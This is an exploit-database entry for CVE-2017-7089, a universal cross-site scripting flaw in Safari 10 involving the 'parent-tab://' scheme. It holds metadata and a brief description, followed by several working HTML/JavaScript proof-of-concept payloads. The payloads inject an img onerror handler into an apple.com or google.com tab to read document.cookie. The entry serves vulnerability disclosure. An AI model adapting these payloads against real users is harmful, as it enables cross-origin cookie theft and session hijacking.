CVE-2017-7089

vendor:

Safari

by:

Frans Rosén

7,5

CVSS

HIGH

Universal Cross Site Scripting

CWE

Product Name: Safari

Affected Version From: Safari 10

Affected Version To: Safari 10

Patch Exists: YES

Related CWE: None

CPE: a:apple:safari:10.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2017

A logic issue existed in the handling of the parent-tab which allowed maliciously crafted web content to lead to universal cross site scripting. An exploit by Frans Rosén was a data:text/html script which opened a parent-tab to apple.com and injected an image tag with an onerror attribute which triggered an alert with the document.domain and document.cookie.

Mitigation:

Improved state management

Source

Exploit-DB raw data:

<!--
# CVE-2017-7089

**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting

**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.

#### Safari 10

##### Local SOP bypass

```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```
##### Exploit by Frans Rosén
```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```
-->

<body onload=document.getElementById('pew').click()>
<a id='pew' href='data:text/html,<script>function y(){x=open(&#x27;parent-tab://apple.com&#x27;,&#x27;_top&#x27;),x.document.body.innerHTML=&#x27;<img/src=""onerror=alert(document.domain);alert(document.cookie);>&#x27;};setTimeout(y,100)</script>'>hello</a>
</body>